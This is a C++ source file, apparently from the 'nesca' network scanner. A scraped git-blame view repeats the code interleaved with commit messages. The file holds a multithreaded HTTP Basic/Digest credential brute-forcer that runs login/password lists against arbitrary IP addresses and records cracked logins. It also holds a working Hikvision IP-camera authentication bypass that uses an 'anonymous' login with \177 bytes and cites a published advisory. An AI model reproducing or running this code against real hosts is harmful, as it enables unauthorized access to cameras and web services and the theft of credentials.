nesca/BasicAuth.cpp

#include "BasicAuth.h"
#include "FileUpdater.h"

int BA::checkOutput(const string *buffer, const char *ip, const int port) {
    if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
            Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
			Utils::ustrstr(*buffer, "http/1.1 200") != -1)
			&& Utils::ustrstr(*buffer, "http/1.1 401 ") == -1
			&& Utils::ustrstr(*buffer, "http/1.0 401 ") == -1
			&& Utils::ustrstr(*buffer, "<statusValue>401</statusValue>") == -1
			&& Utils::ustrstr(*buffer, "<statusString>Unauthorized</statusString>") == -1
			&& Utils::ustrstr(*buffer, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>") == -1
			&& Utils::ustrstr(*buffer, "Неправильны") == -1
			&& Utils::ustrstr(*buffer, "code: \"401\"") == -1 //77.51.196.31:81
            ) {
        return 1;
	}
	else if (Utils::ustrstr(*buffer, "http/1.1 404") != -1
		|| Utils::ustrstr(*buffer, "http/1.0 404") != -1) return -2; 
	else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
		|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
		|| Utils::ustrstr(*buffer, "http/1.0 503") != -1
		|| Utils::ustrstr(*buffer, "400 BAD_REQUEST") != -1
		|| Utils::ustrstr(*buffer, "400 bad request") != -1
		|| Utils::ustrstr(*buffer, "403 Forbidden") != -1
		)
	{
		Sleep(30000);
		return -1;
	}

    return 0;
}

//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
	std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177");

	string buffer;
	Connector con;
	int res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
	if (res > 0) {
		if (BA::checkOutput(&buffer, ip, port) == 1) return 1;
	}
	return 0;
}

lopaStr BA::BABrute(const char *ip, const int port) {
	bool digestMode = true;
	string lpString;
    lopaStr lps = {"UNKNOWN", "", ""};
    int passCounter = 0;
	int res = 0;
	int rowIndex = -1;

	std::string buff;
	Connector con;

	con.nConnect(ip, port, &buff);
	int isDig = Utils::isDigest(&buff);
	QString ipString = QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port);
	if (isDig == -1) {
		stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + ipString + "/\">" +
			ipString + "</a></span>");
		strcpy(lps.login, "");
		return lps;
	}
	else if (isDig == 1) digestMode = true; 
	else digestMode = false;

	std::string buffer;

	if (commenceHikvisionEx1(ip, port, digestMode)) {
		strcpy(lps.login, "anonymous");
		strcpy(lps.pass, "\177\177\177\177\177\177");
		return lps;
	}

    for(int i = 0; i < MaxLogin; ++i) {
        for (int j = 0; j < MaxPass; ++j) {
            FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
            if (!globalScanFlag) return lps;

            lpString = string(loginLst[i]) + ":" + string(passLst[j]);

			Connector con;
			res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
			if (res == -2) return lps;
			else if (res != -1) {
				res = checkOutput(&buffer, ip, port);
				if (res == -2) {

					if (rowIndex == -1) {
						nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "404");
					}
					else {
						stt->doEmitionChangeBARow(rowIndex, "--", "404");
					}
					strcpy(lps.other, "404");
					return lps;
				}
				if (res == -1) {
					++i;
					break;
				}
				if (res == 1) {
					if (rowIndex == -1) {
						nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
					}
					else {
						stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
					}

					strcpy(lps.login, loginLst[i]);
					strcpy(lps.pass, passLst[j]);
					return lps;
				};
			}

			if (BALogSwitched) {
				if (rowIndex == -1) {
					rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port),
						QString(loginLst[i]) + ":" + QString(passLst[j]),
						QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
				}
				else {
					stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), 
						QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
				}
			}
			else { rowIndex = -1; }
			++passCounter;
            Sleep(50);
        }
    }

	if (rowIndex == -1) {
		nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
	}
	else {
		stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
	}
    return lps;
}

lopaStr BA::BALobby(const char *ip, const int port) {
    if(gMaxBrutingThreads > 0) {

        while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);

		++baCount;
		++BrutingThrds;
		const lopaStr &lps = BABrute(ip, port);
		--BrutingThrds;

        return lps;
    } else {
        lopaStr lps = {"UNKNOWN", "", ""};
        return lps;
    }
}
-												not-a-single-fcuk-version

											
										
										
											2015-03-22 00:43:15 +00:00
+								#include "BasicAuth.h"
-												mutex testing

											
										
										
											2015-03-25 14:29:08 +00:00
+								#include "FileUpdater.h"
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+								int BA::checkOutput(const string *buffer, const char *ip, const int port) {
-												Partial refactoring of filter and neg-file module.

											
										
										
											2015-04-16 11:51:51 +00:00
+								    if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
 								            Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
 											Utils::ustrstr(*buffer, "http/1.1 200") != -1)
 											&& Utils::ustrstr(*buffer, "http/1.1 401 ") == -1
 											&& Utils::ustrstr(*buffer, "http/1.0 401 ") == -1
 											&& Utils::ustrstr(*buffer, "<statusValue>401</statusValue>") == -1
 											&& Utils::ustrstr(*buffer, "<statusString>Unauthorized</statusString>") == -1
 											&& Utils::ustrstr(*buffer, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>") == -1
 											&& Utils::ustrstr(*buffer, "Неправильны") == -1
-												BA check, import-index, curl fixes.

											
										
										
											2015-04-20 19:27:06 +00:00
+											&& Utils::ustrstr(*buffer, "code: \"401\"") == -1 //77.51.196.31:81
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								            ) {
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+								        return 1;
-												not-a-single-fcuk-version

											
										
										
											2015-03-22 00:43:15 +00:00
+									}
-BasicAuth check implemented.

											
										
										
											2015-04-19 09:33:26 +00:00
+									else if (Utils::ustrstr(*buffer, "http/1.1 404") != -1
-check + Webcamxp

											
										
										
											2015-04-23 05:23:02 +00:00
+										|| Utils::ustrstr(*buffer, "http/1.0 404") != -1) return -2;
-												Partial refactoring of filter and neg-file module.

											
										
										
											2015-04-16 11:51:51 +00:00
+									else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
 										|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
 										|| Utils::ustrstr(*buffer, "http/1.0 503") != -1
 										|| Utils::ustrstr(*buffer, "400 BAD_REQUEST") != -1
 										|| Utils::ustrstr(*buffer, "400 bad request") != -1
 										|| Utils::ustrstr(*buffer, "403 Forbidden") != -1
-												not-a-single-fcuk-version

											
										
										
											2015-03-22 00:43:15 +00:00
+										)
 									{
 										Sleep(30000);
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+										return -1;
-												not-a-single-fcuk-version

											
										
										
											2015-03-22 00:43:15 +00:00
+									}
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+								    return 0;
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								}
-												Hikvision exploit applied

(http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities)

											
										
										
											2015-04-19 00:02:30 +00:00
+								//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
 								inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
-												HikvisionEx1 fix.

											
										
										
											2015-04-20 19:27:44 +00:00
+									std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177");
-												Hikvision exploit applied

(http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities)

											
										
										
											2015-04-19 00:02:30 +00:00
 									string buffer;
-												Crash fix(?) + fake 401-error fix.

											
										
										
											2015-04-28 23:27:54 +00:00
+									Connector con;
 									int res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+									if (res > 0) {
 										if (BA::checkOutput(&buffer, ip, port) == 1) return 1;
-												Hikvision exploit applied

(http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities)

											
										
										
											2015-04-19 00:02:30 +00:00
+									}
 									return 0;
 								}
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+								lopaStr BA::BABrute(const char *ip, const int port) {
 									bool digestMode = true;
 									string lpString;
-												Threadpool refactoring.

											
										
										
											2015-04-04 12:43:22 +00:00
+								    lopaStr lps = {"UNKNOWN", "", ""};
-												Auto file update carcass

											
										
										
											2015-03-24 14:29:27 +00:00
+								    int passCounter = 0;
-												Multiple fixes.

											
										
										
											2015-04-04 07:24:31 +00:00
+									int res = 0;
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+									int rowIndex = -1;
-												Multiple connection issues fixes.

											
										
										
											2015-04-30 19:21:12 +00:00
 									std::string buff;
 									Connector con;
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
-												Multiple connection issues fixes.

											
										
										
											2015-04-30 19:21:12 +00:00
+									con.nConnect(ip, port, &buff);
 									int isDig = Utils::isDigest(&buff);
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+									QString ipString = QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port);
-												nesca.pro update

											
										
										
											2015-04-25 19:45:01 +00:00
+									if (isDig == -1) {
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+										stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + ipString + "/\">" +
 											ipString + "</a></span>");
-												nesca.pro update

											
										
										
											2015-04-25 19:45:01 +00:00
+										strcpy(lps.login, "");
 										return lps;
 									}
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+									else if (isDig == 1) digestMode = true;
 									else digestMode = false;
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
-												Crash fix(?) + fake 401-error fix.

											
										
										
											2015-04-28 23:27:54 +00:00
+									std::string buffer;
-												Hikvision exploit applied

(http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities)

											
										
										
											2015-04-19 00:02:30 +00:00
+									if (commenceHikvisionEx1(ip, port, digestMode)) {
 										strcpy(lps.login, "anonymous");
 										strcpy(lps.pass, "\177\177\177\177\177\177");
 										return lps;
 									}
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								    for(int i = 0; i < MaxLogin; ++i) {
 								        for (int j = 0; j < MaxPass; ++j) {
-												mutex testing

											
										
										
											2015-03-25 14:29:08 +00:00
+								            FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								            if (!globalScanFlag) return lps;
-												mutex testing

											
										
										
											2015-03-25 14:29:08 +00:00
+								            lpString = string(loginLst[i]) + ":" + string(passLst[j]);
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
-												Crash fix(?) + fake 401-error fix.

											
										
										
											2015-04-28 23:27:54 +00:00
+											Connector con;
 											res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
-												Multiple fixes.

											
										
										
											2015-04-04 07:24:31 +00:00
+											if (res == -2) return lps;
 											else if (res != -1) {
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+												res = checkOutput(&buffer, ip, port);
-check + Webcamxp

											
										
										
											2015-04-23 05:23:02 +00:00
+												if (res == -2) {
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
 													if (rowIndex == -1) {
 														nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "404");
 													}
 													else {
 														stt->doEmitionChangeBARow(rowIndex, "--", "404");
 													}
-check + Webcamxp

											
										
										
											2015-04-23 05:23:02 +00:00
+													strcpy(lps.other, "404");
 													return lps;
 												}
-												Hikvision handler fix.

											
										
										
											2015-04-19 00:28:46 +00:00
+												if (res == -1) {
 													++i;
 													break;
 												}
 												if (res == 1) {
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+													if (rowIndex == -1) {
 														nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
 													}
 													else {
 														stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
 													}
-												Multiple fixes.

											
										
										
											2015-04-04 07:24:31 +00:00
+													strcpy(lps.login, loginLst[i]);
 													strcpy(lps.pass, passLst[j]);
 													return lps;
 												};
 											}
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+											if (BALogSwitched) {
 												if (rowIndex == -1) {
 													rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port),
 														QString(loginLst[i]) + ":" + QString(passLst[j]),
 														QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
 												}
 												else {
 													stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]),
 														QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
 												}
 											}
 											else { rowIndex = -1; }
 											++passCounter;
 								            Sleep(50);
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								        }
 								    }
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+									if (rowIndex == -1) {
 										nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
 									}
 									else {
 										stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
 									}
-												FTP & BA refactoring

											
										
										
											2015-03-16 14:29:34 +00:00
+								    return lps;
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
+								}
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+								lopaStr BA::BALobby(const char *ip, const int port) {
-												Brute-disabling option added

											
										
										
											2015-04-02 12:33:49 +00:00
+								    if(gMaxBrutingThreads > 0) {
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
-												Brute-disabling option added

											
										
										
											2015-04-02 12:33:49 +00:00
+								        while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
-												Threadpool refactoring.

											
										
										
											2015-04-04 12:43:22 +00:00
+										++baCount;
 										++BrutingThrds;
-												Shuffle visualizer

											
										
										
											2015-08-07 22:37:28 +00:00
+										const lopaStr &lps = BABrute(ip, port);
-												Threadpool refactoring.

											
										
										
											2015-04-04 12:43:22 +00:00
+										--BrutingThrds;
-												Brute-disabling option added

											
										
										
											2015-04-02 12:33:49 +00:00
 								        return lps;
 								    } else {
-												Threadpool refactoring.

											
										
										
											2015-04-04 12:43:22 +00:00
+								        lopaStr lps = {"UNKNOWN", "", ""};
-												Brute-disabling option added

											
										
										
											2015-04-02 12:33:49 +00:00
+								        return lps;
 								    }
-												BA refac

											
										
										
											2015-03-13 14:27:21 +00:00
+								}